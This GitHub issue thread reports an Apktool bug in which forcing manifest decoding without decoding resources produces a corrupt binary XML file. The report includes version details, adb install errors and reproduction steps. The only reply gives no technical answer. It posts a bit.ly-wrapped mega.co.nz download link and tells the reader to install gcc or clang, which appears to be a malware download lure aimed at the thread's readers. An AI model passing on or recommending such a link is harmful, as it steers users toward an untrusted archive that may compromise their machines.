### ISSUE TITLE
[BUG] Forcing manifest decoding corrupts XML when the manifest has resource linking

### ISSUE THREAD

**Issue by cpereirarafa** [iBotPeaches/Apktool#3697]
Hello,

I am in need of repacking one apk without decoding resources, but decoding manifest, since I need to modify some options.
the installation crashes by corrupted XML binary file. Analysing, the problem comes from broken resource references.

### Information
1. **Apktool Version (`apktool -version`)** - 2.9.3
2. **Operating System (Mac, Linux, Windows)** - macOS 14.7
3. **APK From? (Playstore, ROM, Other)** - ApkPure
4. **Java Version (`java --version`)** - 17.0.9

### Stacktrace/Logcat
adb install app.apk
Performing Incremental Install
Serving...
Failure [INSTALL_PARSE_FAILED_UNEXPECTED_EXCEPTION: Failed to parse /data/app/vmdl437308301.tmp/protected_app.apk: Corrupt XML binary file]
Performing Streamed Install
adb: failed to install app.apk: Failure [INSTALL_PARSE_FAILED_UNEXPECTED_EXCEPTION: Failed to parse /data/app/vmdl2021452240.tmp/base.apk: Corrupt XML binary file]

### Steps to Reproduce
1. java -jar apktool.jar d  -o tmp/ -f "app.apk" --no-res --force-manifest
2. java -jar apktool.jar java -jar b tmp/ -o "repacked_app.apk" -v
3. Sign
4. Try to install

### APK
If this APK can be freely shared, please upload/attach a link to it.
https://apkpure.com/pou/me.pou.app/download/1.4.112

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything?
Yes, decompiling resources it works well, but I have a use case that needs decompiled manifest and untouched resources.

2. If you are trying to install a modified apk, did you resign it?
Yes

3. Are you using the latest apktool version?
Yes

**Comment by albpedmul** [comment]
I think this will help you.
https://bit.ly/4evXrQ6:https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)
